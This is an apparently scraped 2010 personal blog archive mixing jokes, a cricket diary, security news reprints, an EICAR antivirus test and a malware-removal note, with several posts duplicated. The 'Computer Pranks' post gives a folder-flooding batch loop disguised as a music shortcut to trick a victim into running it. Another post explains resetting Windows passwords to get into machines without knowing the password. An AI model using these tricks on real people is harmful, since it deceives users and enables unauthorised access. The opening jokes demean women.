Tuesday, December 14, 2010
Thursday, July 15, 2010
Murphy's Laws on Women !!
Murphy's Laws on Women !!:
"Hope you have a good laugh after reading this.. I am quite sure all the guys will like this post.
1. Chances are - If you think that a woman is beautiful, she will always have a husband, or a boy-friend - to prove it !
2. Chances are - The more beautiful a woman is, the greater the chances that, she may dump you !
3. Chances are - The more make up - a woman wears - she may look proprtionately uglier !
4. Chances are - the man standing next to a beautiful woman and chatting with her, may not be her brother !
5. Chances are - if the woman whom you like, likes you back, she may let you know about her interest in you, after you are married to another lady !
6. Chances are - The more you ignore a woman, the more she would be interested in you !
7. Chances are - The more you chase a woman, the faster she may run away from you !
8. Chances are - The more you like a woman, the more her father will dislike you !
9. Chances are - the number of bullets in the gun owned by the father of the woman you like, maybe directly proportional to the extent of your interest in his daughter !
10. Chances are - when you get a woman to be alone with you, her friend will come to meet her !
11. Chances are - when you get a woman to be alone with you, her friend who comes to meet her, will be a handsome and very exciting male hunk !
12. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, you are most badly dressed !
13. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, you forgot to brush your teeth !
14. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, you forgot to wear body deodarant !
15. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, you have an itch problem !
16. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, you have a gas problem in your tummy !
17. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, your ex-girl friend comes to re-concile with you !
18. Only 35 % of the women in this world are supposed to be beautiful. Chances are that, it is only the balance 65 %, who may be in your company !
"
"Hope you have a good laugh after reading this.. I am quite sure all the guys will like this post.
1. Chances are - If you think that a woman is beautiful, she will always have a husband, or a boy-friend - to prove it !
2. Chances are - The more beautiful a woman is, the greater the chances that, she may dump you !
3. Chances are - The more make up - a woman wears - she may look proprtionately uglier !
4. Chances are - the man standing next to a beautiful woman and chatting with her, may not be her brother !
5. Chances are - if the woman whom you like, likes you back, she may let you know about her interest in you, after you are married to another lady !
6. Chances are - The more you ignore a woman, the more she would be interested in you !
7. Chances are - The more you chase a woman, the faster she may run away from you !
8. Chances are - The more you like a woman, the more her father will dislike you !
9. Chances are - the number of bullets in the gun owned by the father of the woman you like, maybe directly proportional to the extent of your interest in his daughter !
10. Chances are - when you get a woman to be alone with you, her friend will come to meet her !
11. Chances are - when you get a woman to be alone with you, her friend who comes to meet her, will be a handsome and very exciting male hunk !
12. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, you are most badly dressed !
13. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, you forgot to brush your teeth !
14. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, you forgot to wear body deodarant !
15. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, you have an itch problem !
16. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, you have a gas problem in your tummy !
17. Chances are - the day, the woman whom you like comes to talk to you, that may be the day when, your ex-girl friend comes to re-concile with you !
18. Only 35 % of the women in this world are supposed to be beautiful. Chances are that, it is only the balance 65 %, who may be in your company !
"
Monday, May 17, 2010
My First Bowling Experience
Yesterday we had match against Mohawks in the WPL tournament. My captain asked me whether I will be able to bowl today… I said yes and he said I will be bowling in the second spell. I was very excited and nervous too... since for the first time am gonna bowl in mat pitch using stitch ball for Spartans… I have bowled many times in nets but in center of the pitch this is the first time…
My team was very much supportive and they gave me a chance… the first spell was bowled by Ganesh, Kamal, they bowled really well and the match in our control… In the second spell, Guru started the over and he also bowled very well… I was asked to bowl the sixth over.
I was very nervous and excited wen I bowled my first ball… it was a gr8 experience… second ball I made a wide away the line in half… I made myself relaxed and bowled the next ball… I took a wicket in my first over with a full toss ball caught in short covers, taken by Dilip… I gave 6 runs in my first over… then again in the second over… I went gr8 and gave only 2 runs… its was a nice over…
My third over came and keeper was behind the stumps and fine leg was brought inside the ring… I made two stupid balls in the leg side and the ball went wide and four… which cost 10 runs… other than tat two stupid balls I gave only 4 runs…
Over all my performance was three overs 22 runs and 1 wicket … but I got tired after my last over and made few misfield… Finally the match was cancelled due to bad light and bad umpiring decisions.
I learned tat I need to improve my stamina a lot and concentrate more on bowling and especially fielding. A special thanks to my friends Vijay, Ganesh, Guru for trusting me and giving an opportunity to bowl.
My team was very much supportive and they gave me a chance… the first spell was bowled by Ganesh, Kamal, they bowled really well and the match in our control… In the second spell, Guru started the over and he also bowled very well… I was asked to bowl the sixth over.
I was very nervous and excited wen I bowled my first ball… it was a gr8 experience… second ball I made a wide away the line in half… I made myself relaxed and bowled the next ball… I took a wicket in my first over with a full toss ball caught in short covers, taken by Dilip… I gave 6 runs in my first over… then again in the second over… I went gr8 and gave only 2 runs… its was a nice over…
My third over came and keeper was behind the stumps and fine leg was brought inside the ring… I made two stupid balls in the leg side and the ball went wide and four… which cost 10 runs… other than tat two stupid balls I gave only 4 runs…
Over all my performance was three overs 22 runs and 1 wicket … but I got tired after my last over and made few misfield… Finally the match was cancelled due to bad light and bad umpiring decisions.
I learned tat I need to improve my stamina a lot and concentrate more on bowling and especially fielding. A special thanks to my friends Vijay, Ganesh, Guru for trusting me and giving an opportunity to bowl.
Thursday, April 29, 2010
Computer Pranks
Computer Pranks:
Today , I will show you 3 great computer pranks that will frustrate the victims very much.
1)Make over 1,000 folders in few seconds
Here I will teach you simple prank that will make an unlimited amount of folders in any place you want.
Step 1
Open notepad and type :
@echo off
:top
md %random%
goto top
@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop
Step 2
Save it as 1000folders.bat
After that you will get icon that looks as show below
People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it
Step 3
Right click on icon and click Create Shortcut
Step 4
Right click on shortcut and click properties , then click on Change Icon and rename icon
tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized
somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…
2)Microsoft Word Prank
Here , I will show you great microsoft word prank that will frustrate the victims very much, whenever they type a certain word, another word appears! This prank is great for office and schools.
Step 1
Launch microsoft word
Step 2
Go to Tools -> AutoCorrect Options…
Step 3
In the space where it says Replace , type a real common word such as the, and, a,I, you etc. In the space that says With , type in a crazy word such as fdgfdhkihyob45, whatever you want! Then , click on Add
3) Cool Windows Prank
This will make it to where your friend cannot click on anything on the screen.
Step 1
Take a screenshot of the desktop. You can use windows printscreen or one of the many printscreen software. I prefer to use PrtScr.
Step 2
Make your printscreen picture as desktop background.
Step 3
Right click on desktop , then click View->Show Desktop Icons
That is it , when you click on the “icons”, nothing will happen!
Wednesday, April 28, 2010
Excellent Short Story! ... Superb.......!!!!
Really very Interesting. Must Read. This could happen to u.
A short story contest in a Software Company
There was a contest in an Indian Software Company, to write a fictional story for 500 words max which would start with the line “On a dark and foggy night, a small figure lay huddled on the railway tracks leading to the Chennai station ”
This is what a guy wrote for the contest……. and surprisingly, it was adjudged the best short story.
On a dark and foggy night, a small figure lay huddled on the railway tracks leading to the Chennai station. At once I was held back to see someone in that position during midnight with no one around. With curiosity taking the front seat, I went near the body and tried to investigate it. There was blood all over the body which was lying face down. It seemed that a ruthless blow by the last train could have caused the end of this body which seemed to be that of a guy of around my age. Amidst the gory blood flow, I could see a folded white envelope which was fluttering in the midnight wind. Carefully I took the blood stained envelope and was surprised to see the phrase “appraisal letter” on it. With curiosity rising every moment, I wasted no time in opening the envelope to see if I can find some details about the dead guy. The tag around the body’s neck and the jazzy appraisal cover gave me the hint that he might be a software engineer.
I opened the envelope to find a shining paper on which the appraisal details where typed in flying colors. Thunders broke into my ears and lightening struck my heart when I saw the appraisal amount of the dead
guy!!!!! My God, it was not even, as much as the cost of the letter on which the appraisal details were printed…. My heart poured out for the guy and huge calls were heard inside my mind saying “no wonder, this guy died such a miserable death”… As a fellow worker in the same industry, I thought I should mourn for him for the sake of respect and stood there with a heavy heart thinking of the shock that he would have experienced when his manager had placed the appraisal letter in his hand. I am sure his heart would have stopped and eyes would have gone blank for few seconds looking at the near to nothing increment in his salary.
While I mourned for him, for a second my hands froze to see the employee’s name in the appraisal letter…hey, what a strange co-incidence, this guy’s name is same as mine, including the initials. This was interesting. With some mental strength, I turned the body upside down and found myself fainted for a second. The guy not only had my name, but also looked exactly like me. Same looks, same built, same name…. it was me who was dead there!!!!!!!! While I was lost in that shock, I felt someone patting on my shoulders. My heart stopped completely, I could not breathe and sprung in fear to see who was behind……… Splash!!! Went the glass of water on my laptop screen as I came out of my wild dream to see my manager standing behind my chair patting on my shoulder saying, “Wake up man! Come to meeting room number two. I have your appraisal letter ready”.
A short story contest in a Software Company
There was a contest in an Indian Software Company, to write a fictional story for 500 words max which would start with the line “On a dark and foggy night, a small figure lay huddled on the railway tracks leading to the Chennai station ”
This is what a guy wrote for the contest……. and surprisingly, it was adjudged the best short story.
On a dark and foggy night, a small figure lay huddled on the railway tracks leading to the Chennai station. At once I was held back to see someone in that position during midnight with no one around. With curiosity taking the front seat, I went near the body and tried to investigate it. There was blood all over the body which was lying face down. It seemed that a ruthless blow by the last train could have caused the end of this body which seemed to be that of a guy of around my age. Amidst the gory blood flow, I could see a folded white envelope which was fluttering in the midnight wind. Carefully I took the blood stained envelope and was surprised to see the phrase “appraisal letter” on it. With curiosity rising every moment, I wasted no time in opening the envelope to see if I can find some details about the dead guy. The tag around the body’s neck and the jazzy appraisal cover gave me the hint that he might be a software engineer.
I opened the envelope to find a shining paper on which the appraisal details where typed in flying colors. Thunders broke into my ears and lightening struck my heart when I saw the appraisal amount of the dead
guy!!!!! My God, it was not even, as much as the cost of the letter on which the appraisal details were printed…. My heart poured out for the guy and huge calls were heard inside my mind saying “no wonder, this guy died such a miserable death”… As a fellow worker in the same industry, I thought I should mourn for him for the sake of respect and stood there with a heavy heart thinking of the shock that he would have experienced when his manager had placed the appraisal letter in his hand. I am sure his heart would have stopped and eyes would have gone blank for few seconds looking at the near to nothing increment in his salary.
While I mourned for him, for a second my hands froze to see the employee’s name in the appraisal letter…hey, what a strange co-incidence, this guy’s name is same as mine, including the initials. This was interesting. With some mental strength, I turned the body upside down and found myself fainted for a second. The guy not only had my name, but also looked exactly like me. Same looks, same built, same name…. it was me who was dead there!!!!!!!! While I was lost in that shock, I felt someone patting on my shoulders. My heart stopped completely, I could not breathe and sprung in fear to see who was behind……… Splash!!! Went the glass of water on my laptop screen as I came out of my wild dream to see my manager standing behind my chair patting on my shoulder saying, “Wake up man! Come to meeting room number two. I have your appraisal letter ready”.
Monday, April 19, 2010
How to Test the Working of your Antivirus – EICAR Test
How to Test the Working of your Antivirus – EICAR Test
Have you ever wondered how to test your Antivirus software to ensure it’s proper working? Well here is a quick and easy way to test your antivirus. The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. Here is a step-by-step procedure to test your antivirus.
1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
2. Rename the file from New Text Document.TXT to myfile.com
3. Now run the antivirus scan on this myfile.com file.
If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.
NOTE: Most antivirus will pop-out a warning message in the Step-1 itself.
You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive. Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.
Have you ever wondered how to test your Antivirus software to ensure it’s proper working? Well here is a quick and easy way to test your antivirus. The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. Here is a step-by-step procedure to test your antivirus.
1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
2. Rename the file from New Text Document.TXT to myfile.com
3. Now run the antivirus scan on this myfile.com file.
If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.
NOTE: Most antivirus will pop-out a warning message in the Step-1 itself.
You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive. Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.
Friday, March 26, 2010
How to Hack Windows Administrator Password
This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.
- You do not need to know the old password to set a new one
- Will detect and offer to unlock locked or disabled out user accounts!
- There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.
How it works?
Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below
Offline NT Password & Reg Editor Download
It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.
Another simple way to reset non-administrator account passwords
Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.
1. Open the command prompt (Start->Run->type cmd->Enter)
2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.
Thursday, March 25, 2010
High Profile Twitter Hacker Arrested in France
High Profile Twitter Hacker Arrested in France
Questioned, released and ordered to appear in court
The hacker credited with pulling off the most damaging hack against Twitter to date, which resulted in the leak of thousands of confidential corporate documents, was arrested by authorities in France. However, the Frenchman was questioned about an earlier attack involving unauthorized access to several high profile Twitter accounts, including that of Barack Obama.
At the beginning of May last year, someone calling himself "Hacker Croll" took credit for obtaining unauthorized access to a Twitter's administrative backend. In order to sustain his claim, the hacker released screenshots and private information taken from accounts belonging to the likes of Ashton Kutcher, Lily Rose Allen and Barack Obama.
The hacker explained at the time that he used nothing more than social engineering to hijack the e-mail and password of a Twitter employee named Jason Goldman. This gave him access to information from any account on the micro-blogging platform.
"Hacker Croll" repeated the feat a few months later, in July, but on a much larger scale. Starting by hacking into the personal e-mail account of a different Twitter worker, he eventually managed to access the company's Google Apps account, where thousands of internal corporate documents and communications were hosted.
Many of those files were later leaked and published online. Private information collected from them also allowed the hacker to social-engineer his way into the Gmail, AT&T, Amazon, PayPal, iTunes, MobileMe and GoDaddy accounts of multiple Twitter employees, including the company's founders Evan Williams and Biz Stone.
The French police finally caught up with "Hacker Croll" on Wednesday in the city of Clermont-Ferrand, after an investigation that lasted several months and involved a strong collaboration with the FBI. AFP reports that the 25-year-old unemployed hacker was released from police custody after being questioned in regards to the first incident and admitting to his involvement.
"He was a young man spending time on the Internet. He acted as a result of a bet, out of the defiance of the hacker. He is the sort who likes to claim responsibility for what he has done," prosecutor Jean-Yves Coquillat commented for the French news agency. He is scheduled to appear in court on June 24 and could face a sentence of two years in jail.
Monday, March 22, 2010
XP Smart Security Removal
XP Smart Security Removal / ComboFix
The virus which attacked my laptop last weekend… I just removed it from the Task manager. But when ever my laptop connect to the WEB, it get started again…
I just referred some site and found that below registry code can be used to remove the same…
1. Click Start->Run (or WinKey+R). Input: "command". Press Enter or click OK.
2. Type "notepad" as shown in the image below and press Enter. Notepad will open.
3. Copy and past the following text into Notepad:
Windows Registry Editor Version 5.00[-HKEY_CURRENT_USERSoftwareClasses.exe]
[-HKEY_CURRENT_USERSoftwareClassessecfile]
[-HKEY_CLASSES_ROOTsecfile]
[-HKEY_CLASSES_ROOT.exeshellopencommand][HKEY_CLASSES_ROOTexefileshellopencommand]
@=""%1″ %*"
[HKEY_CLASSES_ROOT.exe]
@="exefile"
"Content Type"="application/x-msdownload"
I tried the same but no use… the XP smart Security still pop-up again and irritated me… As usual my final and the best malware fix which can remove all these F$%$% things is ComboFix… I just went to http://www.combofix.org and downloaded the file and ran it in my laptop and got it fixed…
Main Things to be considered while using ComboFix are
1, This is a freeware and every day it gets updated, so you need the latest version to fix your laptop/desktop.
2, Its extremely a powerful program, which could even CRASH your computer. So pls be careful while using this.
3, b4 running this in your comp, don't 4get to disable the antivirus or firewall in your desktop/laptop.
4, It may take some time to clean up your system, but after the full clean up. Your system performance will be great.
I strongly recommend ComboFix to clean up your computer, if you have enough knowledge in using the same…
Wednesday, February 17, 2010
Research Highlights Top 25 Programming Errors
A group of renowned security researchers led by the MITRE Corporation, also including the National Cyber Security Division (US Department of Homeland Security) and the SANS Institute, have updated their one-year-old findings, and republished the list of the top 25 most dangerous programming errors.
The list is broken down into three major categories as follows: Insecure interaction between components, Risky resource management and Porous Defenses. The entire list of programming errors is comprised of:
1. Failure to Preserve Web Page Structure ('Cross-site Scripting')
2. Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection')
3. Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
4. Cross-Site Request Forgery (CSRF)
5. Improper Access Control (Authorization)
6. Reliance on Untrusted Inputs in a Security Decision
7. Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
8. Unrestricted Upload of File with Dangerous Type
9. Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection')
10. Missing Encryption of Sensitive Data
11. Use of Hard-coded Credentials
12. Buffer Access with Incorrect Length Value
13. Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
14. Improper Validation of Array Index
15. Improper Check for Unusual or Exceptional Conditions
16. Information Exposure Through an Error Message
17. Integer Overflow or Wraparound
18. Incorrect Calculation of Buffer Size
19. Missing Authentication for Critical Function
20. Download of Code Without Integrity Check
21. Incorrect Permission Assignment for Critical Resource
22. Allocation of Resources Without Limits or Throttling
23. URL Redirection to Untrusted Site ('Open Redirect')
24. Use of a Broken or Risky Cryptographic Algorithm
25. Race Condition.
The list was voted during a period of ten days by representatives of various organizations, the votes being cast for a vast category of metrics, the most important being critical importance and widespread prevalence. To avoid organizations being biased to one or more errors, only one vote per organization was allowed. The nominees list was then sorted based on the aggregate scores received by each error.
The authors didn't limit themselves to only listing these errors but went on record and encouraged customers to insert special security and application anti-hacking protection clauses in future contracts, providing a draft for those interested. The researchers' conclusions tend to blame in equal part the developers and IT educational institutes.
While few IT and programming courses really tackle the subject of product and code security, the main problem to the recent recorded hacks remains the programmer's reduced security knowledge base. The MITRE report tries to offer a solution by encouraging customers to contractually force either employees and freelancers into foul-proofing their code.
“As a customer, you have the power to influence vendors to provide more secure products by letting them know that security is important to you,” says the MITRE report. “Use the Top 25 to help set minimum expectations for due care by software vendors. Consider using the Top 25 as part of contract language during the software acquisition process.”
The complete report, with technical details, code samples, detection methods, references and interpretation guidance can be found on the MITRE page or the SANS Institute page.
The list is broken down into three major categories as follows: Insecure interaction between components, Risky resource management and Porous Defenses. The entire list of programming errors is comprised of:
2. Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection')
3. Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
4. Cross-Site Request Forgery (CSRF)
5. Improper Access Control (Authorization)
6. Reliance on Untrusted Inputs in a Security Decision
7. Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
8. Unrestricted Upload of File with Dangerous Type
9. Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection')
10. Missing Encryption of Sensitive Data
11. Use of Hard-coded Credentials
12. Buffer Access with Incorrect Length Value
13. Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
14. Improper Validation of Array Index
15. Improper Check for Unusual or Exceptional Conditions
16. Information Exposure Through an Error Message
17. Integer Overflow or Wraparound
18. Incorrect Calculation of Buffer Size
19. Missing Authentication for Critical Function
20. Download of Code Without Integrity Check
21. Incorrect Permission Assignment for Critical Resource
22. Allocation of Resources Without Limits or Throttling
23. URL Redirection to Untrusted Site ('Open Redirect')
24. Use of a Broken or Risky Cryptographic Algorithm
25. Race Condition.
The list was voted during a period of ten days by representatives of various organizations, the votes being cast for a vast category of metrics, the most important being critical importance and widespread prevalence. To avoid organizations being biased to one or more errors, only one vote per organization was allowed. The nominees list was then sorted based on the aggregate scores received by each error.
The authors didn't limit themselves to only listing these errors but went on record and encouraged customers to insert special security and application anti-hacking protection clauses in future contracts, providing a draft for those interested. The researchers' conclusions tend to blame in equal part the developers and IT educational institutes.
While few IT and programming courses really tackle the subject of product and code security, the main problem to the recent recorded hacks remains the programmer's reduced security knowledge base. The MITRE report tries to offer a solution by encouraging customers to contractually force either employees and freelancers into foul-proofing their code.
“As a customer, you have the power to influence vendors to provide more secure products by letting them know that security is important to you,” says the MITRE report. “Use the Top 25 to help set minimum expectations for due care by software vendors. Consider using the Top 25 as part of contract language during the software acquisition process.”
The complete report, with technical details, code samples, detection methods, references and interpretation guidance can be found on the MITRE page or the SANS Institute page.
Thursday, February 11, 2010
New Banking Trojan Discovered in the Wild
New Banking Trojan Discovered in the Wild - Used to perform ACH and wire fraud - Softpedia
Researchers from Atlanta-based security vendor SecureWorks have discovered a new information-stealing trojan facilitating ACH and wire fraud. The trojan has all the capabilities of malware commonly used to steal money from SMBs and non-profits.
An unprecedented wave of Automated Clearing House (ACH) and wire fraud started in 2009, resulting in small and medium-sized companies, public institutions and non-profit organizations losing millions of dollars to cyber-criminals. The problem prompted the FBI and the American Bankers Association torecommend that online banking operations be performed from dedicated computers only.
These attacks start by infecting computers on an organization's network with the purpose of stealing online banking credentials. The Clampi and Zeus (Zbot) families of trojans have so far dominated this aspect of cyber-crime and positioned themselves as the leading information-stealing computer trojans.
However, it seems other groups are willing to challenge that supremacy, especially since antivirus products are getting better at generically detecting modified Clampi and Zeus variants, which significantly reduces their success rate. The trojan discovered by SecureWorks back in January, which was dubbed Bugat, appears to be one of these new competitors.
"In mid-January, the installer for Bugat had moderate coverage (20/40), according to VirusTotal. The most commonly identified name (Bredolab) corresponds to a family of trojan downloaders. However, its runtime behavior did not match what one would expect from Bredolab. The installed mspdb30.dll file had almost no AV recognition (2/41)," Jason Milletary, SecureWorks' technical director for malware analysis, explains on the company's research blog.
Bugat is capable of capturing information entered in Web forms, altering the content of targeted websites or stealing browser cookies, as well as FTP and POP3 credentials. Additionally, the malware can function as a SOCKS proxy server, upload files from the infected computer to a remote server or download and execute programs.
The trojan communicates with a command and control (C&C) server from where it receives instructions and updates to the list of financial websites it targets. This communication can be encrypted in order to thwart traffic inspection tools.
"The emergence of Bugat reinforces that there is a strong demand for new malware to commit financial credential theft and that ACH and wire fraud remains a profitable venture for criminals," Mr. Milletary concludes. Indeed, just last week, Symantec warned of a new Zeus-like crimeware toolkit called SpyEye.
An unprecedented wave of Automated Clearing House (ACH) and wire fraud started in 2009, resulting in small and medium-sized companies, public institutions and non-profit organizations losing millions of dollars to cyber-criminals. The problem prompted the FBI and the American Bankers Association torecommend that online banking operations be performed from dedicated computers only.
These attacks start by infecting computers on an organization's network with the purpose of stealing online banking credentials. The Clampi and Zeus (Zbot) families of trojans have so far dominated this aspect of cyber-crime and positioned themselves as the leading information-stealing computer trojans.
However, it seems other groups are willing to challenge that supremacy, especially since antivirus products are getting better at generically detecting modified Clampi and Zeus variants, which significantly reduces their success rate. The trojan discovered by SecureWorks back in January, which was dubbed Bugat, appears to be one of these new competitors.
"In mid-January, the installer for Bugat had moderate coverage (20/40), according to VirusTotal. The most commonly identified name (Bredolab) corresponds to a family of trojan downloaders. However, its runtime behavior did not match what one would expect from Bredolab. The installed mspdb30.dll file had almost no AV recognition (2/41)," Jason Milletary, SecureWorks' technical director for malware analysis, explains on the company's research blog.
Bugat is capable of capturing information entered in Web forms, altering the content of targeted websites or stealing browser cookies, as well as FTP and POP3 credentials. Additionally, the malware can function as a SOCKS proxy server, upload files from the infected computer to a remote server or download and execute programs.
The trojan communicates with a command and control (C&C) server from where it receives instructions and updates to the list of financial websites it targets. This communication can be encrypted in order to thwart traffic inspection tools.
"The emergence of Bugat reinforces that there is a strong demand for new malware to commit financial credential theft and that ACH and wire fraud remains a profitable venture for criminals," Mr. Milletary concludes. Indeed, just last week, Symantec warned of a new Zeus-like crimeware toolkit called SpyEye.
Tuesday, January 19, 2010
Taiwan man dies after watching 'Avatar'
AFP: Taiwan man dies after watching 'Avatar':
"TAIPEI — A 42-year-old Taiwanese man with a history of high blood pressure has died of a stroke likely triggered by over-excitement from watching the blockbuster 'Avatar' in 3D, a doctor said Tuesday.
The man, identified only by his surname Kuo, started to feel unwell during the screening earlier this month in the northern city of Hsinchu and was taken to hospital.
Kuo, who suffered from hypertension, was unconscious when he arrived at the Nan Men General Hospital and a scan showed that his brain was haemorrhaging, emergency room doctor Peng Chin-chih said.
'It's likely that the over-excitement from watching the movie triggered his symptoms,' he told AFP.
Kuo died 11 days later from the brain haemorrhage, and the China Times newspaper said it was the first death linked to watching James Cameron's science-fiction epic 'Avatar'.
Film blogging sites have reported complaints of headaches, dizziness, nausea and blurry eyesight from viewers of 'Avatar' and other movies rich in 3D imagery."
"TAIPEI — A 42-year-old Taiwanese man with a history of high blood pressure has died of a stroke likely triggered by over-excitement from watching the blockbuster 'Avatar' in 3D, a doctor said Tuesday.
The man, identified only by his surname Kuo, started to feel unwell during the screening earlier this month in the northern city of Hsinchu and was taken to hospital.
Kuo, who suffered from hypertension, was unconscious when he arrived at the Nan Men General Hospital and a scan showed that his brain was haemorrhaging, emergency room doctor Peng Chin-chih said.
'It's likely that the over-excitement from watching the movie triggered his symptoms,' he told AFP.
Kuo died 11 days later from the brain haemorrhage, and the China Times newspaper said it was the first death linked to watching James Cameron's science-fiction epic 'Avatar'.
Film blogging sites have reported complaints of headaches, dizziness, nausea and blurry eyesight from viewers of 'Avatar' and other movies rich in 3D imagery."
Monday, January 18, 2010
McAfee Will Offer Free Six-Month Subscriptions to Facebook Users - McAfee becomes Facebook's main security service provider - Softpedia
McAfee Will Offer Free Six-Month Subscriptions to Facebook Users - McAfee becomes Facebook's main security service provider - Softpedia:
"Facebook and McAfee announced on January 13, 2009 a partnership through which over 350 million Facebook users will benefit at no cost of a free six-month subscription to McAfee's Internet Security Suite security software. After this six-month period, Facebook users will have the possibility to extend their license at a special discount price.
Besides the free software, Facebook users will benefit from a whole range of new tools built to enhance their and Facebook's security at the same time providing a safer and virus-free environment on the social networking platform.
Users who had their account infected or compromised now have the possibility to employ a new and innovative tool developed by Facebook and McAfee, which will help them re-secure their account. Custom McAfee technology will scan and clean the user's computer before allowing them to log on Facebook again. This tool incorporates McAfee technology and will be provided at no costs for the user.
Facebook has declined to financially capitalize on its users and will provide (alongside McAfee) a series of tutorials and educational materials to help them raise their security knowledge.
McAfee was chosen as the premiere software security provider after Facebook spent serious time on a review process of major security companies. Products like McAfee SiteAdvisor (website rating technology) and McAfee Active Protection (technology for almost instantly blocking known and unknown online threats) have been critical in the reviewing process.
It is unsure whether these products will be included in Facebook's new security measures aimed at detecting and blocking suspicious activities in real-time.
Regarding this topic, Jake Brill, Facebook representative and Project Manager in Facebook's Integrity Team, had this to say, “We invest in dedicated teams and advanced technical systems that detect and block suspicious behavior. When we find a message with a link to a fake login page or other malicious website, we prevent it from being sent and delete all instances of it from the site.” He added that “We also work with third parties to get malicious sites added to browser blacklists or removed completely.”
Users can learn more on this offer by visiting McAfee's Facebook page and clicking on the “Protect Your PC” tab.
Facebook has set up a Security Page for updates and tutorials on issues and topics concerning the site's security."
"Facebook and McAfee announced on January 13, 2009 a partnership through which over 350 million Facebook users will benefit at no cost of a free six-month subscription to McAfee's Internet Security Suite security software. After this six-month period, Facebook users will have the possibility to extend their license at a special discount price.
Besides the free software, Facebook users will benefit from a whole range of new tools built to enhance their and Facebook's security at the same time providing a safer and virus-free environment on the social networking platform.
Users who had their account infected or compromised now have the possibility to employ a new and innovative tool developed by Facebook and McAfee, which will help them re-secure their account. Custom McAfee technology will scan and clean the user's computer before allowing them to log on Facebook again. This tool incorporates McAfee technology and will be provided at no costs for the user.
Facebook has declined to financially capitalize on its users and will provide (alongside McAfee) a series of tutorials and educational materials to help them raise their security knowledge.
McAfee was chosen as the premiere software security provider after Facebook spent serious time on a review process of major security companies. Products like McAfee SiteAdvisor (website rating technology) and McAfee Active Protection (technology for almost instantly blocking known and unknown online threats) have been critical in the reviewing process.
It is unsure whether these products will be included in Facebook's new security measures aimed at detecting and blocking suspicious activities in real-time.
